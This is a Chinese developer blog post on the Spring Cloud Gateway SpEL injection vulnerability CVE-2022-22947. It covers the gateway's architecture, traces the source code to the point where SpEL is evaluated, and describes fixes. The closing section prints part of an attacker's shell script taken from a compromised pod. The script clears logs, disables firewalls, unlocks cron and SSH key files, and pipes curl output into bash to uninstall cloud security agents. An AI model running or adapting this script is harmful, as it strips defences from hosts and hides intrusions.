Spring-Cloud-Gateway之代码注入漏洞及解决

  • Java大飞哥

    2022-09-27 20:20:29
  • 数据库开发技术
  • 原创

1.背景

在工作中有同事遇到了一个问题这个问题就是SpringCloudGateway之代码注入漏洞(CVE-2022-22947),然后他就尝试升级相关版本号,在本地跑起来出现了一个循环依赖:
spring:  main:    allow-bean-definition-overriding: true    allow-circular-references: true
然后设置了springBoot支持循环依赖的配置开启但是还是依旧解决不了该问题,让后在我几天的尝试之下终于把这个这个问题解决了,这个漏洞导致生产的网关应用被攻击,从而导致k8s中的pod被黑客利用这个漏洞注入脚本攻击让网关的pod挂掉后又被k8s拉起,然生产网关不可用,我还找到了一个黑客攻击的脚本,下面把这个脚本分享给大家,然后整理了下思路写了这篇文章。
下图是修复之后观察到应用的日志输出,成功阻止了注入脚本的执行:


2.漏洞简介

Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。Spring官方博客发布了一篇关于Spring Cloud Gateway的CVE报告,据公告描述,当启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码。

漏洞版本范围:3.0.0及其一下版本

漏洞可以被利用的点参考:

https://github.com/vulhub/vulhub/blob/master/spring/CVE-2022-22947/README.zh-cn.mdhttps://github.com/d-rn/vulBox/blob/main/cve_2022_22947.py

2.原理

2.1SpringCloudGateway的原理

Spring Cloud Gateway 是Spring Cloud的一个全新的API网关项目,目的是为了替换掉Zuul1,它基于Spring5.0 + SpringBoot2.0 + WebFlux(基于性能的Reactor模式响应式通信框架Netty,异步阻塞模型)等技术开发,性能于Zuul,官测试,Spring Cloud GateWay是Zuul的1.6倍 ,旨在为微服务架构提供种简单有效的统的API路由管理式

官网:
https://docs.spring.io/spring-cloud-gateway/docs/current/reference/html/https://github.com/spring-cloud/spring-cloud-gateway

核心流程

流程说明:

  1. Gateway Client 向 Spring Cloud Gateway 发送请求

  2. 请求首先会被 HttpWebHandlerAdapter 进行提取组装成网关上下文

  3. 然后网关的上下文会传递到 DispatcherHandler ,它负责将请求分发给 RoutePredicateHandlerMapping

  4. RoutePredicateHandlerMapping 负责路由查找,并根据路由断言判断路由是否可用

  5. 如果过断言成功,由FilteringWebHandler 创建过滤器链并调用

  6. 通过特定于请求的 Fliter 链运行请求,Filter 被虚线分隔的原因是Filter可以在发送代理请求之前(pre)和之后(post)运行逻辑

  7. 执行所有pre过滤器逻辑。然后进行代理请求。发出代理请求后,将运行“post”过滤器逻辑。

  8. 处理完毕之后将 Response 返回到 Gateway 客户端




常见的 API 网关实现方案主要有以下 6种:

1)Spring Cloud Gateway

是Spring Cloud的一个全新的API网关项目,替换Zuul开发的网关服务,基于Spring5.0 + SpringBoot2.0 + WebFlux(基于性能的Reactor模式响应式通信框架Netty,异步阻塞模型)等技术开发,性能高于Zuul

2)Spring Cloud Netflix Zuul

Zuul 1.0 : Netflix开源的网关,使用Java开发,基于Servlet架构构建,便于二次开发。因为基于Servlet内部延迟严重,并发场景不友好,一个线程只能处理一次连接请求。

Zuul 2.0 : 采用Netty实现异步非阻塞编程模型,一个CPU一个线程,能够处理所有的请求和响应,请求响应的生命周期通过事件和回调进行处理,减少线程数量,开销较小

3)Kong

基于OpenResty(Nginx + Lua模块)编写的高可用、易扩展的,性能高效且稳定,支持多个可用插件(限流、鉴权)等,开箱即可用,只支持HTTP协议,且二次开发扩展难,缺乏更易用的管理和配置方式

4)Nginx+Lua

 性能要比上面的强很多,使用Nginx的反向代码和负载均衡实现对API服务器的负载均衡以及高可用,lua作为一款脚本语言,可以编写一些简单的逻辑,但是无法嵌入到微服务架构中

5)Traefik

       6)openresty

https://openresty.org/cn/

网关的作用:在微服务大行其道的今天,微服务引入了 网关 的概念,网关为微服务架构的系统提供简单、有效且统一的API路由管理作为系统的统一入口,提供内部服务的路由中转给客户端提供统一的服务,可以实现一些和业务没有耦合的公用逻辑,主要功能包含认证、鉴权、路由转发、安全策略、防刷、流量控制、监控日志等

我自己对网关的理解方案是:nginx(kong/F5等软硬件的反向代理和负载均衡作为流量网关,弹性伸缩扛住亿级流量的冲击(流量入口控制),入口流量分发到后端的的k8s上 + k8s(ingeress等网络、isto等产品(灰度)) + SpringCloudGataway(api网关+业务网关)  
核心概念:
注意:其中 Route 和 Predicate 必须同时声明。

Route(路由):  网关最基本的模块。它由一个 ID、一个目标 URI、一组断言(Predicate)和一组过滤器(Filter)组成。

Predicate(断言):  路由转发的判断条件,我们可以通过 Predicate 对 HTTP 请求进行匹配,例如请求方式、请求路径、请求头、参数等,如果请求与断言匹配成功,则将请求转发到相应的服务。

Filter(过滤器):  过滤器,我们可以使用它对请求进行拦截和修改,还可以使用它对上文的响应进行再处理。

核心思想: 路由转发+执行过滤器链


Predicate 断言:当满足条件后才会进行转发路由,如果是多个,那么多个条件需要同时满足

使用 Predicate 断言需要注意以下 3 点:

1)Route 路由与 Predicate 断言的对应关系为“一对多”,一个路由可以包含多个不同断言。

2)一个请求想要转发到指定的路由上,就必须同时匹配路由上的所有断言。

3)当一个请求同时满足多个路由的断言条件时,请求只会被首个成功匹配的路由转发。

常见断言如下:


常见断言如下,请参看官网:

https://docs.spring.io/spring-cloud-gateway/docs/current/reference/html/#gateway-request-predicates-factories


断言 示例 说明
Path - Path=/dept/list/**  当请求路径与 /dept/list/** 匹配时,该请求才能被转发到 http://localhost:8001 上。
Before - Before=2021-10-20T11:47:34.255+08:00[Asia/Shanghai] 在 2021 年 10 月 20 日 11 时 47 分 34.255 秒之前的请求,才会被转发到 http://localhost:8001 上。
After - After=2021-10-20T11:47:34.255+08:00[Asia/Shanghai] 在 2021 年 10 月 20 日 11 时 47 分 34.255 秒之后的请求,才会被转发到 http://localhost:8001 上。
Between - Between=2021-10-20T15:18:33.226+08:00[Asia/Shanghai],2021-10-20T15:23:33.226+08:00[Asia/Shanghai] 在 2021 年 10 月 20 日 15 时 18 分 33.226 秒 到 2021 年 10 月 20 日 15 时 23 分 33.226 秒之间的请求,才会被转发到 http://localhost:8001 服务器上。
Cookie - Cookie=name,c.biancheng.net 携带 Cookie 且 Cookie 的内容为 name=c.biancheng.net 的请求,才会被转发到 http://localhost:8001 上。
Header - Header=X-Request-Id,\d+ 请求头上携带属性 X-Request-Id 且属性值为整数的请求,才会被转发到 http://localhost:8001 上。
Method - Method=GET 只有 GET 请求才会被转发到 http://localhost:8001 上。


 动态路由:

默认情况下,Spring Cloud Gateway 会根据服务注册中心(例如 Eureka Server)中维护的服务列表,以服务名(spring.application.name)作为路径创建动态路由进行转发,从而实现动态路由功能。
我们可以在配置文件中,将 Route 的 uri 地址修改为以下形式。

lb://service-name以上配置说明如下:lb:uri 的协议,表示开启 Spring Cloud Gateway 的负载均衡功能。service-name:服务名,Spring Cloud Gateway 会根据它获取到具体的微服务地址。
#application.yml 示例:将gateway跟注册中心整合,比如:eureka,nacos或者是其它的注册中心server:  port: 9527 #端口号spring:  application:    name: microServiceCloudGateway  #服务注册中心注册的服务名
  cloud:    gateway: #网关路由配置      discovery:        locator:          enabled: true #默认值为 true,即默认开启从注册中心动态创建路由的功能,利用微服务名进行路由      routes:        #将 micro-service-cloud-provider-dept-8001 提供的服务隐藏起来,不暴露给客户端,只给客户端暴露 API 网关的地址 9527        - id: provider_dept_list_routh   #路由 id,没有固定规则,但唯一,建议与服务名对应          uri: lb://MICROSERVICECLOUDPROVIDERDEPT #动态路由,使用服务名代替上面的具体带端口   http://eureka7001.com:9527/dept/list          predicates:            #以下是断言条件,必选全部符合条件            - Path=/dept/list/**    #断言,路径匹配 注意:Path 中 P 为大写            - Method=GET #只能时 GET 请求时,才能访问eureka:  instance:    instance-id: micro-service-cloud-gateway-9527    hostname: micro-service-cloud-gateway  client:    fetch-registry: true    register-with-eureka: true    service-url:      defaultZone: http://eureka7001.com:7001/eureka/,http://eureka7002.com:7002/eureka/,http://eureka7003.com:7003/eureka/


Filter 过滤器:

Spring Cloud GateWay 内置的Filter生命周期有两种:

pre(业务逻辑之前):

这种过滤器在请求被转发到微服务之前可以对请求进行拦截和修改,例如参数校验、权限校验、流量监控、日志输出以及协议转换等操作

post(业务逻辑之后):

这种过滤器在微服务对请求做出响应后可以对响应进行拦截和再处理,例如修改响应内容或响应头、日志输出、流量监控等。

GateWay本身自带的Filter分为两种:

GateWayFilter(单一:32种):GatewayFilter:应用在单个路由或者一组路由上的过滤器

GlobalFilter(全局:9种):应用在所有的路由上的过滤器,是一种作用于所有的路由上的全局过滤器,通过它,我们可以实现一些统一化的业务功能,例如权限认证、IP 访问限制等。当某个请求被路由匹配时,那么所有的 GlobalFilter 会和该路由自身配置的 GatewayFilter 组合成一个过滤器链

GateWay Filter提供了丰富的过滤器的使用,单一的有32种,全局的有9种,有兴趣的小伙伴可以了解一下

单一:https://docs.spring.io/spring-cloud-gateway/docs/current/reference/html/#gatewayfilter-factories全局:https://docs.spring.io/spring-cloud-gateway/docs/current/reference/html/#global-filters
#application.yml 示例spring:  cloud:    gateway:       routes:        - id: xxxx          uri: xxxx          predicates:            - Path=xxxx          filters:            - AddRequestParameter=X-Request-Id,1024 #过滤器工厂会在匹配的请求头加上一对请求头,名称为 X-Request-Id 值为 1024            - PrefixPath=/dept #在请求路径前面加上 /dept            ……

内置了多达 31 种单一 GatewayFilter如下:

路由过滤器 描述 参数 使用示例
AddRequestHeader  拦截传入的请求,并在请求上添加一个指定的请求头参数。 name:需要添加的请求头参数的 key;
value:需要添加的请求头参数的 value。		 - AddRequestHeader=my-request-header,1024
AddRequestParameter 拦截传入的请求,并在请求上添加一个指定的请求参数。 name:需要添加的请求参数的 key;
value:需要添加的请求参数的 value。		 - AddRequestParameter=my-request-param,c.biancheng.net
AddResponseHeader 拦截响应,并在响应上添加一个指定的响应头参数。 name:需要添加的响应头的 key;
value:需要添加的响应头的 value。		 - AddResponseHeader=my-response-header,c.biancheng.net
PrefixPath 拦截传入的请求,并在请求路径增加一个指定的前缀。  prefix:需要增加的路径前缀。 - PrefixPath=/consumer
PreserveHostHeader 转发请求时,保持客户端的 Host 信息不变,然后将它传递到提供具体服务的微服务中。 - PreserveHostHeader
RemoveRequestHeader 移除请求头中指定的参数。 name:需要移除的请求头的 key。 - RemoveRequestHeader=my-request-header
RemoveResponseHeader 移除响应头中指定的参数。 name:需要移除的响应头。 - RemoveResponseHeader=my-response-header
RemoveRequestParameter 移除指定的请求参数。 name:需要移除的请求参数。 - RemoveRequestParameter=my-request-param
RequestSize 配置请求体的大小,当请求体过大时,将会返回 413 Payload Too Large。 maxSize:请求体的大小。 - name: RequestSize
   args:
     maxSize: 5000000

自定义 GlobalFilter 全局过滤器

import lombok.extern.slf4j.Slf4j;import org.springframework.cloud.gateway.filter.GatewayFilterChain;import org.springframework.cloud.gateway.filter.GlobalFilter;import org.springframework.core.Ordered;import org.springframework.http.HttpStatus;import org.springframework.stereotype.Component;import org.springframework.web.server.ServerWebExchange;import reactor.core.publisher.Mono;import java.util.Date;/*** 自定义全局网关过滤器(GlobalFilter)*/@Component@Slf4jpublic class MyGlobalFilter implements GlobalFilter, Ordered {    @Override    public Mono filter(ServerWebExchange exchange, GatewayFilterChain chain) {        log.info("进入自定义的全局过滤器 MyGlobalFilter" + new Date());        String uname = exchange.getRequest().getQueryParams().getFirst("uname");        if (uname == null) {            log.info("参数 uname 不能为 null!");            exchange.getResponse().setStatusCode(HttpStatus.NOT_ACCEPTABLE);            return exchange.getResponse().setComplete();        }        return chain.filter(exchange);    }    @Override    public int getOrder() {        //过滤器的顺序,0 表示第一个        return 0;    }}


2.2webFlux的相关组件和原理

    由于Spring-Cloud-Gateway是基于WebFlux响应式框架之上的(基于性能的Reactor模式响应式通信框架Netty,异步阻塞模型),所以了解下webFlux的相关组件和原理更加有助于我们学习Spring-Cloud-Gateway。

这和WebMVC的结构图很像,解释一下各部分工作。

容器reactor-netty:即基于netty实现的符合reactor标准的容器,Spring Boot默认使用它。其对应的关键核心接口是HttpHandler,webflux中对应的重要实现类是:WebHttpHandlerBuilder,它是整个webflux程序的入口。

1)Webfilter:过滤器

2)DispatcherHandler:核心处理器,协调如下三个核心组件工作

3)HandleMapping:存储请求URI和处理器的对应关系

4)HandlerAdapter:封装了主要处理逻辑,处理结果封装成HandlerResult

5)HandlerResultHandler:针对上一步结果的处理器

6)WebExceptionHandler:整个流程中抛出的任何异常,都会被它捕获,“真”全局异常处理


3.漏洞源码分析

      在项目启动的时候Spring-Cloud-Gateway项目启动的时候引入跟springBoot集成的starter启动器包的时候会自动装配一些类:

     入口是从这个类开始:DispatcherHandler类相当于springMVC中的DispatcherServlet类,里面有个handle()方法:

@Override  public Mono<Void> handle(ServerWebExchange exchange) {    if (this.handlerMappings == null) {      return createNotFoundError();    }    if (CorsUtils.isPreFlightRequest(exchange.getRequest())) {      return handlePreFlight(exchange);    }    return Flux.fromIterable(this.handlerMappings)        .concatMap(mapping -> mapping.getHandler(exchange))        .next()        .switchIfEmpty(createNotFoundError())        .flatMap(handler -> invokeHandler(exchange, handler))        .flatMap(result -> handleResult(exchange, result));  }

       handle()中有个getHandler():

@Override  public Mono getHandler(ServerWebExchange exchange) {    return getHandlerInternal(exchange).map(handler -> {      if (logger.isDebugEnabled()) {        logger.debug(exchange.getLogPrefix() + "Mapped to " + handler);      }      ServerHttpRequest request = exchange.getRequest();      if (hasCorsConfigurationSource(handler) || CorsUtils.isPreFlightRequest(request)) {        CorsConfiguration config = (this.corsConfigurationSource != null ?            this.corsConfigurationSource.getCorsConfiguration(exchange) : null);        CorsConfiguration handlerConfig = getCorsConfiguration(handler, exchange);        config = (config != null ? config.combine(handlerConfig) : handlerConfig);        if (config != null) {          config.validateAllowCredentials();        }        if (!this.corsProcessor.process(config, exchange) || CorsUtils.isPreFlightRequest(request)) {          return NO_OP_HANDLER;        }      }      return handler;    });  }
      getHandler()中有个getHandlerInternal()方法:


       最后会调用RoutePredicateHandlerMapping子类中的getHandlerInternal()方法.


GatewayAutoConfiguration这个类中有跟路由配置有关的配置文件加载的bean装配,各种Filter的bean装配、各种RoutePredicateFactory(路由断言工程bean)的bean装配
  # filter链的构建处理类  @Bean  public FilteringWebHandler filteringWebHandler(List globalFilters) {    return new FilteringWebHandler(globalFilters);  }
  # 路由断言映射  @Bean  @ConditionalOnMissingBean  public RoutePredicateHandlerMapping routePredicateHandlerMapping(FilteringWebHandler webHandler,      RouteLocator routeLocator, GlobalCorsProperties globalCorsProperties, Environment environment) {    return new RoutePredicateHandlerMapping(webHandler, routeLocator, globalCorsProperties, environment);  } # 网关配置类  @Bean  public GatewayProperties gatewayProperties() {    return new GatewayProperties();  } # 网关配置服务service  @Bean  public ConfigurationService gatewayConfigurationService(BeanFactory beanFactory,      @Qualifier("webFluxConversionService") ObjectProvider conversionService,      ObjectProvider validator) {    return new ConfigurationService(beanFactory, conversionService, validator);  }# 路由定义  @Bean  public RouteLocator routeDefinitionRouteLocator(GatewayProperties properties,      List gatewayFilters, List predicates,      RouteDefinitionLocator routeDefinitionLocator, ConfigurationService configurationService) {    return new RouteDefinitionRouteLocator(routeDefinitionLocator, predicates, gatewayFilters, properties,        configurationService);  }  # 这个类是最后进入NettyRoutingFilter 这个filter真正做请求的发送,他使用HttpClient进行请求的发送   @Bean    @ConditionalOnEnabledGlobalFilter    public NettyRoutingFilter routingFilter(HttpClient httpClient,        ObjectProvider> headersFilters, HttpClientProperties properties) {      return new NettyRoutingFilter(httpClient, headersFilters, properties);    }
调用触发的入口是RoutePredicateHandlerMappinggetHandlerInternal()方法中的lookupRoute()请求循环匹配路由:




protected Mono lookupRoute(ServerWebExchange exchange) {     // 获取所有定义的路由然后根据请求的参数属性匹配断言    return this.routeLocator.getRoutes()        // individually filter routes so that filterWhen error delaying is not a        // problem        .concatMap(route -> Mono.just(route).filterWhen(r -> {          // add the current route we are testing          exchange.getAttributes().put(GATEWAY_PREDICATE_ROUTE_ATTR, r.getId());          return r.getPredicate().apply(exchange);        })            // instead of immediately stopping main flux due to error, log and            // swallow it            .doOnError(e -> logger.error("Error applying predicate for route: " + route.getId(), e))            .onErrorResume(e -> Mono.empty()))        // .defaultIfEmpty() put a static Route not found        // or .switchIfEmpty()        // .switchIfEmpty(Mono.empty().log("noroute"))        .next()        // TODO: error handling        .map(route -> {          if (logger.isDebugEnabled()) {            logger.debug("Route matched: " + route.getId());          }          validateRoute(route, exchange);          return route;        });
    /*     * TODO: trace logging if (logger.isTraceEnabled()) {     * logger.trace("RouteDefinition did not match: " + routeDefinition.getId()); }     */  }
三种路由定义实现:缓存、组合和配置路由定义




RouteDefinitionRouteLocator中的getRoutes()


@Override  public Flux getRoutes() {    Flux routes = this.routeDefinitionLocator.getRouteDefinitions().map(this::convertToRoute);
    if (!gatewayProperties.isFailOnRouteDefinitionError()) {      // instead of letting error bubble up, continue      routes = routes.onErrorContinue((error, obj) -> {        if (logger.isWarnEnabled()) {          logger.warn("RouteDefinition id " + ((RouteDefinition) obj).getId()              + " will be ignored. Definition has invalid configs, " + error.getMessage());        }      });    }
    return routes.map(route -> {      if (logger.isDebugEnabled()) {        logger.debug("RouteDefinition matched: " + route.getId());      }      return route;    });  }
convertToRoute()


private Route convertToRoute(RouteDefinition routeDefinition) {    AsyncPredicate predicate = combinePredicates(routeDefinition);    List gatewayFilters = getFilters(routeDefinition);
    return Route.async(routeDefinition).asyncPredicate(predicate).replaceFilters(gatewayFilters).build();  }
combinePredicates()找到组合断言匹配到的请求:


private AsyncPredicate combinePredicates(RouteDefinition routeDefinition) {    List predicates = routeDefinition.getPredicates();    if (predicates == null || predicates.isEmpty()) {      // this is a very rare case, but possible, just match all      return AsyncPredicate.from(exchange -> true);    }    AsyncPredicate predicate = lookup(routeDefinition, predicates.get(0));
    for (PredicateDefinition andPredicate : predicates.subList(1, predicates.size())) {      AsyncPredicate found = lookup(routeDefinition, andPredicate);      predicate = predicate.and(found);    }
    return predicate;  }
getFilters(routeDefinition):获取所有的过滤器


private List getFilters(RouteDefinition routeDefinition) {    List filters = new ArrayList<>();
    // TODO: support option to apply defaults after route specific filters?    if (!this.gatewayProperties.getDefaultFilters().isEmpty()) {      filters.addAll(loadGatewayFilters(routeDefinition.getId(),          new ArrayList<>(this.gatewayProperties.getDefaultFilters())));    }
    if (!routeDefinition.getFilters().isEmpty()) {      filters.addAll(loadGatewayFilters(routeDefinition.getId(), new ArrayList<>(routeDefinition.getFilters())));    }
    AnnotationAwareOrderComparator.sort(filters);    return filters;  }
  List loadGatewayFilters(String id, List filterDefinitions) {    ArrayList ordered = new ArrayList<>(filterDefinitions.size());    for (int i = 0; i < filterDefinitions.size(); i++) {      FilterDefinition definition = filterDefinitions.get(i);      GatewayFilterFactory factory = this.gatewayFilterFactories.get(definition.getName());      if (factory == null) {        throw new IllegalArgumentException(            "Unable to find GatewayFilterFactory with name " + definition.getName());      }      if (logger.isDebugEnabled()) {        logger.debug("RouteDefinition " + id + " applying filter " + definition.getArgs() + " to "            + definition.getName());      }
      // @formatter:off      Object configuration = this.configurationService.with(factory)          .name(definition.getName())          .properties(definition.getArgs())          .eventFunction((bound, properties) -> new FilterArgsEvent(              // TODO: why explicit cast needed or java compile fails              RouteDefinitionRouteLocator.this, id, (Map) properties))          .bind();      // @formatter:on
      // some filters require routeId      // TODO: is there a better place to apply this?      if (configuration instanceof HasRouteId) {        HasRouteId hasRouteId = (HasRouteId) configuration;        hasRouteId.setRouteId(id);      }
      GatewayFilter gatewayFilter = factory.apply(configuration);      if (gatewayFilter instanceof Ordered) {        ordered.add(gatewayFilter);      }      else {        ordered.add(new OrderedGatewayFilter(gatewayFilter, i + 1));      }    }
    return ordered;  }
loadGatewayFilters():方法中有个configurationService.bind()方法:根据断言对应的断言工厂然后调用了configurationService.bind()方法


public T bind() {      validate();      Assert.hasText(this.name, "name may not be empty");      Assert.isTrue(this.properties != null || this.normalizedProperties != null,          "properties and normalizedProperties both may not be null");
      if (this.normalizedProperties == null) {        // 归一化处理        this.normalizedProperties = normalizeProperties();      }
      T bound = doBind();
      if (this.eventFunction != null && this.service.publisher != null) {        ApplicationEvent applicationEvent = this.eventFunction.apply(bound, this.normalizedProperties);        this.service.publisher.publishEvent(applicationEvent);      }
      return bound;    }
然后调用到实现类方法如下:


@Override    protected Map normalizeProperties() {      if (this.service.beanFactory != null) {        return this.configurable.shortcutType().normalize(this.properties, this.configurable,            this.service.parser, this.service.beanFactory);      }      return super.normalizeProperties();    }
方法调用栈:




shortcutType()接口对应实现类如下:




匹配到DEFULT枚举中的normalize()里面调用了getValue()方法:




static Object getValue(SpelExpressionParser parser, BeanFactory beanFactory, String entryValue) {    Object value;    String rawValue = entryValue;    if (rawValue != null) {      rawValue = rawValue.trim();    }    if (rawValue != null && rawValue.startsWith("#{") && entryValue.endsWith("}")) {      // assume it's spel      GatewayEvaluationContext context = new GatewayEvaluationContext(beanFactory);      Expression expression = parser.parseExpression(entryValue, new TemplateParserContext());      value = expression.getValue(context);    }    else {      value = entryValue;    }    return value;  }
   在这个getValue()里面使用GatewayEvaluationContext中有SpelExpressionParser对象即可解析spring的spel表达式,注入就是在这里。


最后根据以上条件会生成一个路由对象:




请求匹配到的路由和匹配到的断言会被对应的断言工厂的所有的过滤器链路上执行,最终通过NettyRoutingFilte的filter方法是被FilteringWebHandler的handle()中的DefaultGatewayFilterChain的filter触发调用http请求服务,然后将请求返回,还会通过GatewayLoadBalancerClientAutoConfiguration来做一些负载均衡:


NettyRoutingFilte的filter方法如下:


public Mono filter(ServerWebExchange exchange, GatewayFilterChain chain) {    URI requestUrl = exchange.getRequiredAttribute(GATEWAY_REQUEST_URL_ATTR);
    String scheme = requestUrl.getScheme();    if (isAlreadyRouted(exchange) || (!"http".equalsIgnoreCase(scheme) && !"https".equalsIgnoreCase(scheme))) {      return chain.filter(exchange);    }    setAlreadyRouted(exchange);
    ServerHttpRequest request = exchange.getRequest();
    final HttpMethod method = HttpMethod.valueOf(request.getMethodValue());    final String url = requestUrl.toASCIIString();
    HttpHeaders filtered = filterRequest(getHeadersFilters(), exchange);
    final DefaultHttpHeaders httpHeaders = new DefaultHttpHeaders();    filtered.forEach(httpHeaders::set);
    boolean preserveHost = exchange.getAttributeOrDefault(PRESERVE_HOST_HEADER_ATTRIBUTE, false);    Route route = exchange.getAttribute(GATEWAY_ROUTE_ATTR);
    Flux responseFlux = getHttpClient(route, exchange).headers(headers -> {      headers.add(httpHeaders);      // Will either be set below, or later by Netty      headers.remove(HttpHeaders.HOST);      if (preserveHost) {        String host = request.getHeaders().getFirst(HttpHeaders.HOST);        headers.add(HttpHeaders.HOST, host);      }    }).request(method).uri(url).send((req, nettyOutbound) -> {      if (log.isTraceEnabled()) {        nettyOutbound.withConnection(connection -> log.trace("outbound route: "            + connection.channel().id().asShortText() + ", inbound: " + exchange.getLogPrefix()));      }      return nettyOutbound.send(request.getBody().map(this::getByteBuf));    }).responseConnection((res, connection) -> {
      // Defer committing the response until all route filters have run      // Put client response as ServerWebExchange attribute and write      // response later NettyWriteResponseFilter      exchange.getAttributes().put(CLIENT_RESPONSE_ATTR, res);      exchange.getAttributes().put(CLIENT_RESPONSE_CONN_ATTR, connection);
      ServerHttpResponse response = exchange.getResponse();      // put headers and status so filters can modify the response      HttpHeaders headers = new HttpHeaders();
      res.responseHeaders().forEach(entry -> headers.add(entry.getKey(), entry.getValue()));
      String contentTypeValue = headers.getFirst(HttpHeaders.CONTENT_TYPE);      if (StringUtils.hasLength(contentTypeValue)) {        exchange.getAttributes().put(ORIGINAL_RESPONSE_CONTENT_TYPE_ATTR, contentTypeValue);      }
      setResponseStatus(res, response);
      // make sure headers filters run after setting status so it is      // available in response      HttpHeaders filteredResponseHeaders = HttpHeadersFilter.filter(getHeadersFilters(), headers, exchange,          Type.RESPONSE);
      if (!filteredResponseHeaders.containsKey(HttpHeaders.TRANSFER_ENCODING)          && filteredResponseHeaders.containsKey(HttpHeaders.CONTENT_LENGTH)) {        // It is not valid to have both the transfer-encoding header and        // the content-length header.        // Remove the transfer-encoding header in the response if the        // content-length header is present.        response.getHeaders().remove(HttpHeaders.TRANSFER_ENCODING);      }
      exchange.getAttributes().put(CLIENT_RESPONSE_HEADER_NAMES, filteredResponseHeaders.keySet());
      response.getHeaders().addAll(filteredResponseHeaders);
      return Mono.just(res);    });
    Duration responseTimeout = getResponseTimeout(route);    if (responseTimeout != null) {      responseFlux = responseFlux          .timeout(responseTimeout,              Mono.error(new TimeoutException("Response took longer than timeout: " + responseTimeout)))          .onErrorMap(TimeoutException.class,              th -> new ResponseStatusException(HttpStatus.GATEWAY_TIMEOUT, th.getMessage(), th));    }
    return responseFlux.then(chain.filter(exchange));  }





4.修复方案


4.1升级版本和关闭gateway的actuator访问暴露端点


https://docs.spring.io/spring-cloud-gateway/docs/current/reference/html/#actuator-api
# 配置management.endpoint.gateway.enabled=false
# spring-cloud-alibaba 依赖对应https://github.com/alibaba/spring-cloud-alibaba/wiki/%E7%89%88%E6%9C%AC%E8%AF%B4%E6%98%8E
# spring-cloud-alibaba-2021-0-1-0版本依赖其它项目所需的版本https://spring.io/blog/2022/03/09/introducing-spring-cloud-alibaba-2021-0-1-0


所以springBoot的版本选择2.6.8




pom的依赖:


<properties>        <java.version>1.8java.version>        <project.build.sourceEncoding>UTF-8project.build.sourceEncoding>        <project.reporting.outputEncoding>UTF-8project.reporting.outputEncoding>        <maven.compiler.source>8maven.compiler.source>        <maven.compiler.target>8maven.compiler.target>        <spring.boot.version>2.6.8spring.boot.version>        <spring.cloud.version>2021.0.3spring.cloud.version>        <spring.cloud.alibaba.version>2021.0.1.0spring.cloud.alibaba.version>        <dubbo.version>2.7.15dubbo.version>properties> <dependencyManagement>        <dependencies>          <dependency>                  <groupId>org.springframework.bootgroupId>                  <artifactId>spring-boot-dependenciesartifactId>                  <version>${spring.boot.version}version>                  <type>pomtype>                  <scope>importscope>              dependency>              <dependency>                  <groupId>org.springframework.cloudgroupId>                  <artifactId>spring-cloud-dependenciesartifactId>                  <version>${spring.cloud.version}version>                  <type>pomtype>                  <scope>importscope>              dependency>              <dependency>                  <groupId>com.alibaba.cloudgroupId>                  <artifactId>spring-cloud-alibaba-dependenciesartifactId>                  <version>${spring.cloud.alibaba.version}version>                  <type>pomtype>                  <scope>importscope>              dependency>              <dependency>                <groupId>org.springframework.bootgroupId>                <artifactId>spring-boot-starter-actuatorartifactId>                <version>${spring.boot.version}version>            dependency>              <dependency>                <groupId>com.alibaba.cloudgroupId>                <artifactId>spring-cloud-starter-alibaba-nacos-discoveryartifactId>                <version>${spring.cloud.alibaba.version}version>            dependency>            <dependency>                <groupId>org.springframework.cloudgroupId>                <artifactId>spring-cloud-starter-netflix-ribbonartifactId>                <version>${spring.cloud.alibaba.version}version>            dependency>            <dependency>                <groupId>com.alibaba.cloudgroupId>                <artifactId>spring-cloud-starter-alibaba-nacos-configartifactId>                <version>${spring.cloud.alibaba.version}version>            dependency>            <dependency>                <groupId>org.apache.dubbogroupId>                <artifactId>dubboartifactId>                <version>${dubbo.version}version>            dependency>            <dependency>                <groupId>org.apache.dubbogroupId>                <artifactId>dubbo-spring-boot-starterartifactId>                <version>${dubbo.version}version>            dependency>        dependencies>         <dependency>            <groupId>org.springframework.cloudgroupId>            <artifactId>spring-cloud-starter-gatewayartifactId>            <version>3.1.3version>        dependency>        <dependency>            <groupId>org.springframework.bootgroupId>            <artifactId>spring-boot-starter-webfluxartifactId>            <version>2.6.8version>        dependency>        <dependency>            <groupId>org.springframework.cloudgroupId>            <artifactId>spring-cloud-starter-loadbalancerartifactId>            <version>3.1.3version>        dependency>        <dependency>            <groupId>org.hdrhistogramgroupId>            <artifactId>HdrHistogramartifactId>            <version>2.1.12version>        dependency>  dependencyManagement>      <build>        <plugins>            <plugin>                <groupId>org.springframework.bootgroupId>                <artifactId>spring-boot-maven-pluginartifactId>                <executions>                    <execution>                        <phase>packagephase>                        <goals>                            <goal>repackagegoal>                        goals>                    execution>                executions>                <configuration>                    <includeSystemScope>trueincludeSystemScope>                    <mainClass>xxxxx.xxxxxx(主类)mainClass>                configuration>            plugin>        plugins>    build>          
          如果上面缺少啥依赖就去maven仓库中搜索添加即可。







4.2使用webFlux的全局filter做一个XSS的转义处理


// 参考 思路自定义一个全局的filter然后实现xss处理https://blog.csdn.net/WXF_Sir/article/details/123983931





5.攻击脚本分享


#!/bin/shulimit -n 65535rm -rf /var/log/syslogchattr -iua /tmp/chattr -iua /var/tmp/chattr -R -i /var/spool/cronchattr -i /etc/crontabufw disableiptables -Fecho "nope" >/tmp/log_rotsudo sysctl kernel.nmi_watchdog=0echo '0' >/proc/sys/kernel/nmi_watchdogecho 'kernel.nmi_watchdog=0' >>/etc/sysctl.confuserdel akayuserdel vfinderchattr -iae /root/.ssh/chattr -iae /root/.ssh/authorized_keysrm -rf /tmp/addres*rm -rf /tmp/walle*rm -rf /tmp/keyspkill -f /tmp/.outps aux| grep "./ll1"| grep -v grep | awk '{print $2}' | xargs -I % kill -9 %if ps aux | grep -i '[a]liyun'; then  curl http://update.aegis.aliyun.com/download/uninstall.sh | bash  curl http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash  pkill aliyun-service  rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service  rm -rf /usr/local/aegis*  systemctl stop aliyun.service  systemctl disable aliyun.service  service bcm-agent stop  yum remove bcm-agent -y  apt-get remove bcm-agent -yelif ps aux | grep -i '[y]unjing'; then  /usr/local/qcloud/stargate/admin/uninstall.sh  /usr/local/qcloud/YunJing/uninst.sh  /usr/local/qcloud/monitor/barad/admin/uninstall.shfinetstat -anp | grep 185.71.65.238 | awk '{print $7}' | awk -F'[/]' 